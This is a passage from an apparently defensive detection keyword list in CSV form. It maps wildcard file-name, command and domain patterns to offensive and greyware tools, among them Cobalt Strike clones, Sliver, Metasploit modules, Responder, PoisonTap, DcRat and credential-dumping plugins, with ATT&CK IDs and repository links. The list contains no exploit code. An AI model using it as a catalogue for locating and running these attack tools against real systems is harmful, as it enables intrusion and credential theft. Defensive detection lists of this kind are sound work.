- T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*pivotnacci http*,offensive_tool_keyword,pivotnacci,A tool to make socks connections through HTTP agents,T1090 - T1090.003,TA0003 - TA0011,N/A,N/A,C2 - Persistence,https://github.com/blackarrowsec/pivotnacci,1,0,N/A,9,10,614,111,2021-03-30T14:37:25Z,2020-04-28T11:36:45Z -*pivotnacci -*,offensive_tool_keyword,pivotnacci,A tool to make socks connections through HTTP agents,T1090 - T1090.003,TA0003 - TA0011,N/A,N/A,C2 - Persistence,https://github.com/blackarrowsec/pivotnacci,1,0,N/A,9,10,614,111,2021-03-30T14:37:25Z,2020-04-28T11:36:45Z -*pivotnacci *--polling-interval*,offensive_tool_keyword,pivotnacci,A tool to make socks connections through HTTP agents,T1090 - T1090.003,TA0003 - TA0011,N/A,N/A,C2 - Persistence,https://github.com/blackarrowsec/pivotnacci,1,0,N/A,9,10,614,111,2021-03-30T14:37:25Z,2020-04-28T11:36:45Z -*pivotnacci/0.0.1*,offensive_tool_keyword,pivotnacci,A tool to make socks connections through HTTP agents,T1090 - T1090.003,TA0003 - TA0011,N/A,N/A,C2 - Persistence,https://github.com/blackarrowsec/pivotnacci,1,1,N/A,9,10,614,111,2021-03-30T14:37:25Z,2020-04-28T11:36:45Z -*pivotnacci-master*,offensive_tool_keyword,pivotnacci,A tool to make socks connections through HTTP agents,T1090 - T1090.003,TA0003 - TA0011,N/A,N/A,C2 - Persistence,https://github.com/blackarrowsec/pivotnacci,1,1,N/A,9,10,614,111,2021-03-30T14:37:25Z,2020-04-28T11:36:45Z -*pivots/named-pipe_windows.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*-pk8gege.org*,offensive_tool_keyword,cobaltstrike,CobaltStrike4.4 one-click 
deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/AlphabugX/csOnvps,1,0,N/A,10,10,277,68,2022-03-19T00:10:03Z,2021-12-02T02:10:42Z -*pkexec64.tar.gz*,offensive_tool_keyword,cobaltstrike,CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. 
to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/AlphabugX/csOnvps,1,1,N/A,10,10,277,68,2022-03-19T00:10:03Z,2021-12-02T02:10:42Z -*pkt_comm/word_gen.*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*pkt_comm/word_list*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*pktmon start*,greyware_tool_keyword,pktmon,pktmon network diagnostics tool for Windows that can be used for packet capture - packet drop detection - packet filtering and counting.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & 
Spoofing,https://learn.microsoft.com/en-us/windows-server/networking/technologies/pktmon/pktmon,1,0,N/A,6,10,N/A,N/A,N/A,N/A -*plex_unpickle_dict_rce.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*plpmggfglncceinmilojdkiijhmajkjh*,greyware_tool_keyword,Red Panda VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*plug_getpass_nps.dll*,offensive_tool_keyword,cobaltstrike,Chinese clone of cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/YDHCUI/manjusaka,1,1,N/A,10,10,664,132,2023-05-09T03:31:53Z,2022-03-18T08:16:04Z -*plug_katz_nps.exe*,offensive_tool_keyword,cobaltstrike,Chinese clone of cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/YDHCUI/manjusaka,1,1,N/A,10,10,664,132,2023-05-09T03:31:53Z,2022-03-18T08:16:04Z -*plug_qvte_nps.exe*,offensive_tool_keyword,cobaltstrike,Chinese clone of cobaltstrike,T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/YDHCUI/manjusaka,1,1,N/A,10,10,664,132,2023-05-09T03:31:53Z,2022-03-18T08:16:04Z -*plugins.nessus.org.*,offensive_tool_keyword,nessus,Vulnerability scanner,T1046 - T1068 - T1190 - T1201 - T1222 - T1592,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Vulnerability scanner,https://fr.tenable.com/products/nessus,1,1,N/A,9,10,N/A,N/A,N/A,N/A -*Plugins\AccessTokens\TokenDriver*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,0,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*Plugins\AccessTokens\TokenManipulation*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,0,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*Plugins\Execution\PSExec*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows 
Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,0,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*Plugins\SendFile.dll*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,0,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*Plugins\SendMemory.dll*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,0,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*plummm/CVE-2022-27666*,offensive_tool_keyword,POC,Exploit for CVE-2022-27666,T1550 - T1555 - T1212 - T1558,TA0005,N/A,N/A,Exploitation tools,https://github.com/plummm/CVE-2022-27666,1,1,N/A,N/A,3,203,41,2022-03-28T18:21:00Z,2022-03-23T22:54:28Z -*pm3 -p /dev/ttyACM0*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*poc.bash*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*poc.bat*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*poc.bin*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation 
tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*poc.exe*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*poc.exe*poc.txt*,offensive_tool_keyword,RecycledInjector,Native Syscalls Shellcode Injector,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/florylsk/RecycledInjector,1,1,N/A,N/A,3,213,35,2023-07-02T11:04:28Z,2023-06-23T16:14:56Z -*poc.msi*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*poc.pl*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*poc.ps1*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*poc.reg*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*poc.run*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*poc.sh*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - 
TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*poc.vb*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*poc.vbe*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*poc.vbs*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*poc.vbscript*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*poc.zsh*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*POC_CloudFilter_ArbitraryFile_EoP*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*POC_CloudFilter_ArbitraryFile_EoP.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*POC_DLL.dll*,offensive_tool_keyword,RunAsWinTcb,RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.,T1073.002 - T1055.001 - T1055.002,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/tastypepperoni/RunAsWinTcb,1,1,N/A,10,2,119,16,2022-08-02T16:35:50Z,2022-07-29T16:36:06Z -*POC1*implant.cpp*,offensive_tool_keyword,ReflectiveNtdll,A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode,T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/reveng007/ReflectiveNtdll,1,0,N/A,10,2,147,22,2023-02-10T05:30:28Z,2023-01-30T08:43:16Z -*POC2*implant.cpp*,offensive_tool_keyword,ReflectiveNtdll,A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode,T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/reveng007/ReflectiveNtdll,1,0,N/A,10,2,147,22,2023-02-10T05:30:28Z,2023-01-30T08:43:16Z -*pocs_go/*/CVE-*.go*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation 
tools,https://github.com/hktalent/scan4all,1,0,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -*podalirius@protonmail.com*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,1,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -*podman run * --name avred -d avred*,offensive_tool_keyword,avred,Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/dobin/avred,1,0,N/A,9,2,172,19,2023-09-30T12:28:42Z,2022-05-19T12:12:34Z -*poeojclicodamonabcabmapamjkkmnnk*,greyware_tool_keyword,HMA VPN Proxy Unblocker,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*poetry run bofhound*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,0,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*poetry run NetExec *,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z 
-*poison_ivy_c2*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Poisoners-Session.log*,offensive_tool_keyword,responder,LLMNR. NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*poisonivy_bof.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*poisontap*,offensive_tool_keyword,poisontap,PoisonTap - siphons cookies. exposes internal router & installs web backdoor on locked computers,T1534.002 - T1059.001 - T1053.005 - T1564.001,TA0002 - TA0007 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/samyk/poisontap,1,0,N/A,N/A,10,6026,1027,2018-11-26T16:50:44Z,2016-11-16T11:51:34Z -*polenum *-protocols *,offensive_tool_keyword,polenum,Uses Impacket Library to get the password policy from a windows machine,T1012 - T1596,TA0009 - TA0007,N/A,N/A,Discovery,https://salsa.debian.org/pkg-security-team/polenum,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*polenum -h*,offensive_tool_keyword,polenum,Uses Impacket Library to get the password policy from a windows machine,T1012 - T1596,TA0009 - TA0007,N/A,N/A,Discovery,https://salsa.debian.org/pkg-security-team/polenum,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*pony-02.aftxt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*pooljnboifbodgifngpppfklhifechoe*,greyware_tool_keyword,GeoProxy,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*poor buffer accounting in str_netfd_alloc*,greyware_tool_keyword,vsftpd,Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dagwieers/vsftpd/,1,0,greyware tool - risks of False positive !,N/A,1,47,66,2020-11-10T13:07:55Z,2013-06-13T10:11:54Z -*pornhub.py*,offensive_tool_keyword,holehe,holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.,T1598.004 - T1592.002 - T1598.001,TA0003 - TA0009,N/A,N/A,Reconnaissance,https://github.com/megadose/holehe,1,0,N/A,6,10,5659,655,2023-09-15T21:14:10Z,2020-06-25T23:03:02Z -*port and pasv both active*,greyware_tool_keyword,vsftpd,Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dagwieers/vsftpd/,1,0,greyware tool - risks of False positive 
